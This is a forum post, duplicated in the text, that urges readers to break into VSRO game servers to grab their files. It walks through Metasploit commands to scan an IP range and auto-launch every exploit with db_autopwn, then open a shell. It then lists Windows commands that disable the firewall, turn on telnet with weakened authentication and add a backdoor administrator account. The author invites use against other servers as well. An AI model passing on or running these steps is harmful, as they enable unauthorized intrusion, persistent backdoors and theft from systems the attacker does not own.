Guys, seriously.. stop dreaming, i don't think any of these people will release the files, most of them are greedy, selfish personalities, look when they said - if we'll get files we'll share blablalba.. now what's going on? You all are like crazy after them. Either you get them from the people that got them or from the VSRO testserver.
Anyways, you can still try to find any vulnreabilities on VSRO servers maybe somoene gets lucky, here's a tip:
- [Only registered and activated users can see links. Click Here To Register...]
- [Only registered and activated users can see links. Click Here To Register...]
- install both
- open metasploit console
- type in:
& hit enter.
- now type:
(it'll take a while to scan everything in there)
- after that you can do:
(this will check all the possible vulnreabilities and launch all possible exploits against them) if any vulnreability will be found, you'll be taken to sessions list. (this process can take hours and hours).
now when it'll be loaded type:
this will list all the available sessions
now type:
If the vulnreability attack will be succesfull you will be able to execute commands.
now write:
And at this point you should finally be able to execute the commands which Chernobyl wrote:
Good luck people, if anyone gets success on this, share the community, dont be bitchez. I did my best to help you out everyone. That's all.
Have fun hacking,
Miki Maus.
P.S. This is one of easiest ways how to attack other computers vulnreabilities, it's not just designed for vsro files, you can use this aswell against other servers, people..
Anyways, you can still try to find any vulnreabilities on VSRO servers maybe somoene gets lucky, here's a tip:
- [Only registered and activated users can see links. Click Here To Register...]
- [Only registered and activated users can see links. Click Here To Register...]
- install both
- open metasploit console
- type in:
Code:
db_connect [username]:[password]@localhost/[database_name_here] example: db_connect user:mypassword@localhost/metasploit
- now type:
Code:
db_nmap 123.30.200.1-255 note: this can be also used for single ip adress. (ex: 123.30.200.70).
- after that you can do:
Code:
db_autopwn -p -t -e
now when it'll be loaded type:
Code:
sessions -l note: small letter "L"
now type:
Code:
sessions -i [the number of session you wanna use for attacking vulnreability] (ex: [B]sessions -i 3[/B]).
now write:
and you're on control of there computer.Quote:
Shell
And at this point you should finally be able to execute the commands which Chernobyl wrote:
Code:
netsh firewall set opmode disable (disables firewall) sc config tlntsvr start= auto (starts service) tlntadmn config port=23 sec=-NTLM (sets telnet port to 23) net start Telnet (starts telnet) net user Admin 7755xx! /add (creates user with username: Admin & password: 7755xx!) net localgroup Administrators Admin /add (gives your Admin user Administrator privilegies) note: never ever use username Admin (make it like windows or something.).
Have fun hacking,
Miki Maus.
P.S. This is one of easiest ways how to attack other computers vulnreabilities, it's not just designed for vsro files, you can use this aswell against other servers, people..